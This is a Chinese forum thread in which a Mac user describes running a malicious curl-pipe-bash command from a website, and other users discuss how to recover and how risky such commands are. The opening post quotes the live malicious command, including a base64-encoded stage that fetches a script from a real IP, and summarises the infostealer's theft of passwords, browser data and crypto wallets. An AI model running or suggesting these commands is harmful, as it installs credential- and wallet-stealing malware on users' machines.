趁周末没事折腾了一下自己的 Mac ,下了一堆乱七八糟的软件
刚刚有个网站给了我一个命令,要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"
感觉是熬夜脑子不清醒了,我真就傻乎乎输入密码执行了脚本,听到 mac 一阵叮叮钉钉的提示音才感觉不对劲
看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本
看到这个命令的时候,脑子都凉了,把脚本喂给 Gemini 告诉我说会去执行以下命令
窃取密码 它会弹出一个伪造的系统对话框,谎称“需要安装应用助手”,诱骗你输入电脑的开机密码。如果你不输入正确的密码,这个对话框会一直骚扰你。
窃取加密货币钱包 (主要目标) 浏览器钱包: 它有一个庞大的列表,专门扫描并窃取数十种加密货币钱包浏览器插件的数据,例如 MetaMask 、Phantom 、Trust Wallet 等。
桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据,例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。
窃取内容包括:保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。
备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。
本地文件: 扫描你的“桌面”和“文稿”文件夹,专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。
然后将这个文件上传到黑客的服务器( IP 地址为 185.93.89.62 ,和你之前那个脚本是同一个地址)。
程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。
这个是不是只能重装系统了?我还要做什么来保护自己的账户吗
![]() | 1 neetz OP 虽然我没有加密钱包之类的东西,但是是不是浏览器存储的钥匙串密码已经全被拿走了? |
![]() | 2 neetz OP ~ vim .pwd ~ vim .username ~ ls -l /Library/LaunchDaemons/ total 88 -rw-r--r--@ 1 root wheel 485 10 月 19 03:47 com.22622.plist -rw-r--r--@ 1 root wheel 8012 10 月 19 03:49 com.77686.plist 照着 gemini 确认了一下...确实钓鱼脚本被我执行成功了... |
3 moudy 16 小时 11 分钟前 ![]() 有一说一, /bin/bash -c "$(curl xxx)”这种指令真的是太扯蛋了。竟然在 mac 和 linux 上普遍使用,实在是无法理解。 |
4 dilidilid 15 小时 46 分钟前 keychain 泄漏的话没啥好的方法,不过现在重要的账号都是动态验证码吧,所以我一直不理解把重要账号的 OTP 密钥保存在 keychain 是什么心态,我只会在手机离线 App 上保存 OTP |
5 dilidilid 15 小时 43 分钟前 @moudy 因为对于普通用户就不应该使用 Terminal ,这本来就是给开发者和专业用户的用法,普通用户只应该运行官网下载和以及 App store 里的软件。非要这么说的话 Windows 上让你打开 powershell 运行某个远程脚本 run as administrator 连密码都不需要输入,点个 yes 就能把敏感信息直接打包带走呢 |
![]() | 6 neetz OP 先把常用的账号密码全改了,剩下的睡一觉起来再说... 真的是脑子抽风了,如果是下载 Windows 要我执行 vbs 脚本我肯定理都不理它,偏偏 mac 很多软件都是通过 brew 执行 shell 脚本安装的,大半夜完全没反应过来直到执行完了才意识到要检查脚本内容 还好我不玩虚拟货币,看起来这个脚本内容主要目标是这玩意。希望泄露的信息最多被用来撞库啥的 |
7 MacsedProtoss 12 小时 49 分钟前 via iPhone @moudy 你在搞笑吧,你是开发者吗? curl 都不让用?你可以直接审查下载下来的脚本,你看到这个指令可以选择不直接执行而是先下载那个脚本下来自己看看再运行。他就是分两步先用 curl 把 sh 脚本拉下来再 bash 来执行罢了 |
8 MacsedProtoss 12 小时 45 分钟前 via iPhone @neetz 重点在于它要求你输入密码这一步,一般这个时候要高度警惕,通常并不需要密码才对,有了密码那就可以提权才能做大部分东西,否则默认访问沙盒或者访问 keychain 之类的应该都是没权限的,偷不了太多(唯一要注意的可能是 ssh key 这种没加密码的话挺危险) |
![]() | 9 Crump 11 小时 42 分钟前 这种案例我见过好多次了,大部分都是折腾盗版软件的稀里糊涂就被坑了,如果不是那就说明你真的是闲得慌瞎折腾。剩下的就是该改密码改密码,系统重装。 |
10 busier 11 小时 42 分钟前 via iPhone |
![]() | 11 Cooky 11 小时 38 分钟前 不明不白的折腾就得加小心,win 下用沙盘,linux 下用 docker |
![]() | 13 avrillavigne 10 小时 58 分钟前 |
![]() | 14 ysc3839 8 小时 52 分钟前 via Android 先重装系统,再改密码,不重装就改还有可能被盗 |
![]() | 15 shinecurve 7 小时 42 分钟前 我一直以为只要懂点命令行的,不轻易执行这种链接指向的脚本是常识... |
![]() | 16 loganovo 7 小时 11 分钟前 我连用 homebrew 装东西, 都要先 info 一下, 看看 rb 脚本, 然后再 install 的, 有和我一样的吗; 但是 upgrade 的时候就懒得一一再去看了; 确实没有发现过有恶意的代码, 但是我不愿执行的操作却有一大堆,这时候我都选择手动安装 |
19 moudy 2 小时 34 分钟前 @MacsedProtoss 下载审查后执行是对的。如果能有一个通用的安全检测流程,或者沙盒模拟机制来确认脚本安全性就会好很多。类似 bash-sandbox -c “$(curl ……)” |
20 dilidilid 2 小时 24 分钟前 via iPhone @moudy brew 本来也是给开发者用的,面向开发者的部署本来就需要在安全和效率之间做权衡。针对普通用户的分发渠道是 App Store ,那玩意儿始终运行在沙盒里。你说的模拟对 brew 没啥意义,真投毒的话你不审查代码的话根本查不出来,怎么确认安全性?要么就一直运行在沙盒,那可以用 docker 或者 orbstack |
21 moudy 2 小时 18 分钟前 @dilidilid 醒醒,谁告诉你 brew 是给开发者用的。n 多有用的软件你去搜官网都是让你 brew 安装。这玩意就是第二个 appstore 。shell 脚本最终能做的也就那些事。读取敏感文件,安装 daemon ,替换 library 或关键 binary 。行为识别已经能卡住大部分恶意脚本了。 |
22 dilidilid 1 小时 49 分钟前 via iPhone @moudy 你说的那 n 多软件基本都是开源软件,开源软件本身就存在更多的供应链风险,你用沙箱测试能规避吗? 我说开发者可能有点极端了,但 brew 确实基本上都是 Pro 用户在用,你可以问问非 Pro 用户买 Mac 的有几个装了 homebrew 。 作为一个佐证,brew 最近一年 install_on_request 事件一共只有一亿次不到,这是包括全平台以及每个包被安装都会计数,homebrew 的 macOS 实际活跃用户估计也就在千万水平,和 macOS 的总体用户规模相去甚远 |
24 dilidilid 1 小时 43 分钟前 via iPhone @moudy 你说的行为识别是杀毒软件的需求,Windows 也是默认这么做的,代价就是性能和 IO 耗损以及误杀,这也是很多人抱怨 Windows 文件系统性能差的一个重要原因。mac 平台上的“供应链投毒”显然没有到需要牺牲流畅度去这么做的程度,如果真的特别在意可以在 Mac 上安装第三方杀毒软件 |
![]() | 25 MYDB 1 小时 38 分钟前 via iPhone 1.物理断网 2.抢救一些重要资料(每个文件都自己过目一遍,不要让 AI 帮你) 3.重装系统和软件,如果有 nas 备份可以从那里还原,但系统自带的还原就不要相信了 4.联网,一一修改密码 |
![]() | 26 aero99 55 分钟前 Mac 上那个有个防火墙软件忘了名字了,装上可以阻止一部分陌生 ip 访问或者询问 |